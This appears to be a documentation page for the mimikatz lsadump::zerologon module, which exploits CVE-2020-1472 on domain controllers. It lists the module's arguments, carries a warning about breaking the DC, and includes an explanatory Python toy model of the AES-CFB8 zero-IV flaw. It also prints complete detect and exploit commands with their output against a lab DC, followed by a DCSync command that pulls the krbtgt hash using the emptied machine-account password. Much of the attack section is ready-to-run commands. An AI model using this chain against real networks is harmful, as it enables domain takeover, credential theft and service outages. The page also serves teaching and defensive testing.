zerologon
lsadump::zerologon detects and exploits the ZeroLogon vulnerability (CVE-2020-1472) in the Netlogon secure channel of a domain controller. It has the following command line arguments:
  • /account: the target DC SamAccountName (its machine account, e.g. dc$)
  • /target: the target DC FQDN
  • /exploit: proceed with exploitation (reset the DC machine account password); without it the module only checks whether the DC is vulnerable
  • /null: use a null session for the RPC connection
  • /ntlm: use NTLM authentication for the RPC connection
  • /type: the Secure Channel Type sent in NetrServerAuthenticate2 (NETLOGON_SECURE_CHANNEL_TYPE in MS-NRPC; the outputs below show the default, 6 = Server). The available values are:
    • Null (0)
    • MsvAp (1)
    • Workstation (2)
    • TrustedDnsDomain (3)
    • TrustedDomain (4)
    • UasServer (5)
    • Server (6)
    • CdcServer (7)
Exploitation sets the DC machine account password in Active Directory to an empty value, while the DC itself keeps the old password in its local LSA secrets. The DC can then no longer authenticate its own secure channel, which breaks domain replication and other services and leads to massive disruption. Running the following "password change" technique against a production DC is therefore not advised; if it is run, the original machine account password must be restored afterwards.

Detection

```
mimikatz # lsadump::zerologon /target:dc.hacklab.local /account:dc$
[rpc] Remote : dc.hacklab.local
[rpc] ProtSeq : ncacn_ip_tcp
[rpc] AuthnSvc : NONE (0)
[rpc] NULL Sess: no

Target : dc.hacklab.local
Account: dc$
Type : 6 (Server)
Mode : detect

Trying to 'authenticate'...
=============================================================================================================================================================================================================================================

NetrServerAuthenticate2: 0x00000000

* Authentication: OK -- vulnerable
```
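Why the detect mode has to retry, and why the all-zero challenge is eventually accepted, comes down to how MS-NRPC computes the Netlogon credential: AES-128 in CFB8 mode with an all-zero IV. The script below is an added example written for this page, not mimikatz code. It models the NetrServerReqChallenge / NetrServerAuthenticate2 exchange that lsadump::zerologon replays with an all-zero client challenge and credential. AES is replaced by a stand-in block function (SHA-256 truncated to 16 bytes) so that it runs with the standard library only; the property shown depends only on CFB8 with a zero IV, not on the cipher. The names ToyDomainController, counter_rng, zerologon_detect and zero_credential_rate are this example's own, and the "enforce_secure_rpc" flag is a deliberate simplification of the CVE-2020-1472 fix, which refuses Netlogon secure channel setup over unsigned RPC.

```python
"""Why lsadump::zerologon's all-zero challenge is accepted about once in 256 tries.
Added example, not mimikatz source. Models the NetrServerReqChallenge /
NetrServerAuthenticate2 exchange that detect mode replays. MS-NRPC uses
AES-128 CFB8 with an all-zero IV; the block cipher here is a stand-in
(SHA-256 truncated to 16 bytes) so only the standard library is needed.
The flaw depends only on CFB8 with a zero IV, not on the cipher used."""
import hashlib

BLOCK = 16          # block size in bytes, as for AES-128
CHALLENGE_LEN = 8   # Netlogon challenges and credentials are 8 bytes
STATUS_SUCCESS = 0x00000000
STATUS_ACCESS_DENIED = 0xC0000022


def block_encrypt(key, block):
    """Stand-in for one AES-128 block encryption (assumption, see docstring)."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key, iv, plaintext):
    """CFB8: each plaintext byte is XORed with byte 0 of E_key(register), then
    the ciphertext byte is shifted into the register. With iv == 0 and
    plaintext == 0, the first output byte is E_key(0)[0]; if that is 0
    (probability 1/256 over keys) the register never changes and every
    following byte is 0 as well."""
    reg, out = iv, bytearray()
    for p in plaintext:
        c = block_encrypt(key, reg)[0] ^ p
        out.append(c)
        reg = reg[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key, challenge):
    """ComputeNetlogonCredential, AES variant (MS-NRPC 3.1.4.4.2): CFB8
    encryption of the 8-byte challenge under an all-zero IV."""
    return cfb8_encrypt(session_key, bytes(BLOCK), challenge)


def counter_rng(seed):
    """Deterministic stand-in for the DC's randomness so runs are reproducible.
    Not a secure RNG; demonstration only."""
    state = {"n": 0}

    def rand(n):
        state["n"] += 1
        return hashlib.sha256(seed + state["n"].to_bytes(8, "big")).digest()[:n]
    return rand


class ToyDomainController:
    """Minimal DC side of the Netlogon authentication handshake."""

    def __init__(self, rand, enforce_secure_rpc=False):
        self._rand = rand
        # Simplified model of the CVE-2020-1472 fix in enforcement mode:
        # secure channel setup over unsigned/unsealed RPC is refused.
        self._enforce = enforce_secure_rpc
        self._client_challenge = self._session_key = None

    def req_challenge(self, client_challenge):
        """NetrServerReqChallenge. A real DC derives the session key from the
        machine account password and both challenges; because its own
        challenge is random, the key is effectively fresh on every attempt."""
        self._client_challenge = client_challenge
        self._session_key = self._rand(BLOCK)
        return self._rand(CHALLENGE_LEN)

    def authenticate2(self, client_credential, secure_rpc):
        """NetrServerAuthenticate2: 0x00000000 only if the credential matches."""
        if self._enforce and not secure_rpc:
            return STATUS_ACCESS_DENIED
        expected = compute_netlogon_credential(self._session_key, self._client_challenge)
        return STATUS_SUCCESS if client_credential == expected else STATUS_ACCESS_DENIED


def zerologon_detect(dc, max_attempts=2000):
    """Detect mode: all-zero client challenge and all-zero client credential over
    plain RPC, retried until the DC answers 0x00000000. Returns the successful
    attempt number, or None if the DC never accepts."""
    zero = bytes(CHALLENGE_LEN)
    for attempt in range(1, max_attempts + 1):
        dc.req_challenge(zero)
        if dc.authenticate2(zero, secure_rpc=False) == STATUS_SUCCESS:
            return attempt
    return None


def zero_credential_rate(n_keys):
    """Fraction of session keys under which the zero challenge yields an all-zero
    credential; expected to be close to 1/256."""
    zero = bytes(CHALLENGE_LEN)
    hits = sum(compute_netlogon_credential(i.to_bytes(BLOCK, "big"), zero) == zero
               for i in range(n_keys))
    return hits / n_keys


if __name__ == "__main__":
    unpatched = ToyDomainController(counter_rng(b"lab-dc"))
    print("unpatched DC accepted on attempt:", zerologon_detect(unpatched))
    patched = ToyDomainController(counter_rng(b"lab-dc"), enforce_secure_rpc=True)
    print("patched DC accepted on attempt:", zerologon_detect(patched))
    print("zero-credential rate over 8192 keys: %.4f (1/256 = %.4f)"
          % (zero_credential_rate(8192), 1 / 256))
```

The session key changes on every NetrServerReqChallenge because the DC's own challenge is random, so each attempt is an independent 1-in-256 draw; that is why a vulnerable DC typically answers 0x00000000 after a few hundred attempts, and why a DC that refuses unsigned Netlogon RPC never does. Note that the toy DC's randomness is seeded for reproducibility; a real DC's session keys are not predictable, only occasionally weak under a zero IV.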

Exploitation

```
mimikatz # lsadump::zerologon /target:dc.hacklab.local /account:dc$ /exploit
[rpc] Remote : dc.hacklab.local
[rpc] ProtSeq : ncacn_ip_tcp
[rpc] AuthnSvc : NONE (0)
[rpc] NULL Sess: no

Target : dc.hacklab.local
Account: dc$
Type : 6 (Server)
Mode : exploit

Trying to 'authenticate'...
=============================================================================================================================================================================================================================================

NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2: 0x00000000

* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
```
A DCSync can then be conducted with lsadump::dcsync, authenticating over NTLM as the DC machine account with its now-empty password:
```
mimikatz # lsadump::dcsync /domain:HACKLAB.LOCAL /dc:dc.hacklab.local /user:krbtgt /authuser:dc$ /authdomain:HACKLAB /authpassword:"" /authntlm
```